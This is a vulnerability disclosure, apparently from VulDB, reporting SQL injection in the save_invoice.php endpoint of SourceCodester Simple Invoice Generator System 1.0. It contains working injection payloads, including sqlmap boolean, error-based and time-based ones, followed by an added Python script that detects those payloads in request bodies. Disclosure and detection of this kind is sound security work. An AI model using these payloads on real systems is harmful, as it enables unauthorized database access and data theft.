Submission #403629: SourceCodester Simple Invoice Generator System 1.0 SQL Injection

Info

Title: SourceCodester Simple Invoice Generator System 1.0 SQL Injection
Description:
I would like to report a SQL injection vulnerability I discovered in SourceCodester's Simple Invoice Generator System during my testing.

Details:
Affected URL/Endpoint: /php-invoice/save_invoice.php
Vulnerable Parameters: 'invoice_code', 'customer', 'cashier', 'total_amount', 'discount_percentage', 'discount_amount', 'tendered_amount'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)

Steps to reproduce:
1) Sign in as any cashier.
2) Fill up the form and "Add Item".
3) Click "Save & Generate Printable Invoice".
4) Use a proxy like Burp Suite to intercept the "save_invoice" request.
5) Input the payload to invoke the SQL injection.
---
cashier=Cashier+1%27+OR+GTID_SUBSET%28CONCAT%280x717a716a71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29+AS+NCHAR%29%2C0x20%29%29%2C1%2C190%29%29%2C0x7162786a71%29%2C8744%29--+BhDR&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty%5B%5D=1&item%5B%5D=test&unit%5B%5D=pcs&price%5B%5D=12&total%5B%5D=12&discount_percentage=0&tendered_amount=0
---
6) It is also vulnerable to the following attacks after running sqlmap on it.
---
Parameter: cashier (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: cashier=Cashier 1' AND EXTRACTVALUE(9612,CASE WHEN (9612=9612) THEN 9612 ELSE 0x3A END)-- rTeI&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0

    Type: error-based
    Title: MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)
    Payload: cashier=Cashier 1' OR GTID_SUBSET(CONCAT(0x717a716a71,(SELECT (ELT(6679=6679,1))),0x7162786a71),6679)-- laEK&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: cashier=Cashier 1' OR (SELECT 7314 FROM (SELECT(SLEEP(5)))EMDB)-- ndpB&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0
---
Please let me know if you need further information or a more detailed analysis.
User: Delvy (UID 74555)
Submitted: 09/06/2024 10:49 AM (1 year ago)
Moderated: 09/06/2024 11:32 PM (13 hours later)
Status: Accepted
VulDB Entry: 276780 [SourceCodester Simple Invoice Generator System 1.0 /save_invoice.php SQL Injection]
Points: 17
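For defenders triaging access logs or WAF captures of this endpoint, the following added example (not part of the submission or the project) scans a raw POST body for the parameter names the report lists and flags the payload families the sqlmap output shows: quote breakout, error-based functions, SLEEP delays, and trailing SQL comments. The sample bodies are constructed copies modelled on the report's payloads; the heuristic labels and regexes are this example's own.

```python
import re
from urllib.parse import parse_qsl

# Parameters of save_invoice.php named in the report. The numeric ones should
# never carry anything but a number, so any other content is itself a signal.
TEXT_FIELDS = {"invoice_code", "customer", "cashier"}
NUMERIC_FIELDS = {"total_amount", "discount_percentage", "discount_amount", "tendered_amount"}

# Indicator patterns modelled on the payload families the report quotes
# (quote breakout, error-based functions, SLEEP-based delay, trailing comment).
INDICATORS = {
    "quote_breakout": re.compile(r"'\s*(?:or|and)\b", re.I),
    "error_based": re.compile(r"\b(?:gtid_subset|extractvalue|updatexml)\s*\(", re.I),
    "time_based": re.compile(r"\bsleep\s*\(\s*\d+", re.I),
    "comment_tail": re.compile(r"(?:--\s*\w*|#)\s*$"),
}
NUMBER = re.compile(r"^-?\d+(?:\.\d+)?$")


def scan_body(body: str) -> dict[str, list[str]]:
    """Map each suspicious parameter name to the indicator labels it triggered."""
    findings: dict[str, list[str]] = {}
    for name, value in parse_qsl(body, keep_blank_values=True):  # decodes %xx and '+'
        hits = []
        if name in NUMERIC_FIELDS and not NUMBER.match(value):
            hits.append("non_numeric")
        if name in TEXT_FIELDS | NUMERIC_FIELDS:
            hits += [label for label, rx in INDICATORS.items() if rx.search(value)]
        if hits:
            findings.setdefault(name, []).extend(hits)
    return findings


# Constructed request bodies modelled on the ones quoted in the report.
SAMPLE_BODIES = {
    "benign": ("cashier=Cashier+1&total_amount=12&discount_amount=0&invoice_code=INV-0001"
               "&customer=Jane+O%27Neil&qty%5B%5D=1&item%5B%5D=test&unit%5B%5D=pcs"
               "&price%5B%5D=12&total%5B%5D=12&discount_percentage=0&tendered_amount=0"),
    "error_based": ("cashier=Cashier+1%27+OR+GTID_SUBSET%28CONCAT%280x717a716a71%2C%28SELECT+"
                    "%28ELT%286679%3D6679%2C1%29%29%29%2C0x7162786a71%29%2C6679%29--+laEK"
                    "&total_amount=12&invoice_code=test&customer=test"),
    "time_based": ("cashier=Cashier+1%27+OR+%28SELECT+7314+FROM+%28SELECT%28SLEEP%285%29%29%29"
                   "EMDB%29--+ndpB&total_amount=12&invoice_code=test&customer=test"),
}

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(f"{label:12s} -> {scan_body(body) or 'clean'}")
```

Pattern matching like this only helps with log triage and alerting; the fix in the application is to pass every one of these parameters to a prepared statement and to cast the numeric ones before use.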
